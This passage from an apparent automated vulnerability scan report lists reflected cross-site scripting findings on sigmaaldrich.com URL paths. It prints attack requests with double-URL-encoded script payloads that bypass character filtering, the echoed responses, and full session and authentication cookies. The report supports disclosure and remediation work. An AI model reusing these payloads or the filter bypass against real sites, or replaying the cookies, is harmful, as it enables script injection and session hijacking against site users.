Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology538c5";alert(1)//9501d1dbcc8/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.131. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f48d6%2522%253balert%25281%2529%252f%252f142bff93666 was submitted in the REST URL parameter 6. This input was echoed as f48d6";alert(1)//142bff93666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfnf48d6%2522%253balert%25281%2529%252f%252f142bff93666 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfnf48d6";alert(1)//142bff93666","E404") ;
   </script>
...[SNIP]...

1.132. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4a66%2522%253balert%25281%2529%252f%252f9cf202f2c34 was submitted in the REST URL parameter 1. This input was echoed as a4a66";alert(1)//9cf202f2c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta4a66%2522%253balert%25281%2529%252f%252f9cf202f2c34/sigma-aldrich/areas-of-interest/materials-science/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta4a66";alert(1)//9cf202f2c34/sigma-aldrich/areas-of-interest/materials-science/material-science-products","E404") ;
   </script>
...[SNIP]...

1.133. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35aaa%2522%253balert%25281%2529%252f%252f81d2c1ca82c was submitted in the REST URL parameter 2. This input was echoed as 35aaa";alert(1)//81d2c1ca82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich35aaa%2522%253balert%25281%2529%252f%252f81d2c1ca82c/areas-of-interest/materials-science/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich35aaa";alert(1)//81d2c1ca82c/areas-of-interest/materials-science/material-science-products","E404") ;
   </script>
...[SNIP]...

1.134. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 887ee%2522%253balert%25281%2529%252f%252f1d67d16e2c4 was submitted in the REST URL parameter 3. This input was echoed as 887ee";alert(1)//1d67d16e2c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest887ee%2522%253balert%25281%2529%252f%252f1d67d16e2c4/materials-science/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest887ee";alert(1)//1d67d16e2c4/materials-science/material-science-products","E404") ;
   </script>
...[SNIP]...

1.135. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2dab%2522%253balert%25281%2529%252f%252f30fc2d7ef7a was submitted in the REST URL parameter 4. This input was echoed as b2dab";alert(1)//30fc2d7ef7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/materials-scienceb2dab%2522%253balert%25281%2529%252f%252f30fc2d7ef7a/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
